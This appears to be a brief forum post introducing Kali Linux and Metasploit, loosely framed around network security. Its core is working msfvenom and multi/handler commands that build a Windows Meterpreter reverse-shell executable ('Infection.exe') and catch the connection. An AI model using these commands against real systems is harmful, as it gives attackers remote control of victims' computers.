Penetration Testing/Ethical Hacking is on the rise with companies paying large amounts to keep their trade secrets and other important intellectual property safe.
Kali Linux is a free linux distribution provided by Offensive Security. It has over 200 tools and programs from information gathering to password cracking.
The main component in Kali Linux for me it Metasploit; It has remote access and exploitation frameworks for almost every OS and application. Here are some examples:
Windows Reverse TCP.
Preparation
msfvenom -f exe -p windows/meterpreter/reverse_tcp --platform windows LHOST={IP HERE} LPORT=4444 > ~/Desktop/Infection.exe
Execution
msfconsole
use exploit/multi/handler
set Payload windows/meterpreter/reverse_tcp
set LHOST={Same IP as before}
set LPORT=4444
exploit
or exploit -j
The above show how quickly and easily a reverse TCP shell can be made.
The overall message which this post tries to give you is that you should look at is my network secure if not how can I secure it etc...
If you liked my post please like and up post.
Thank You.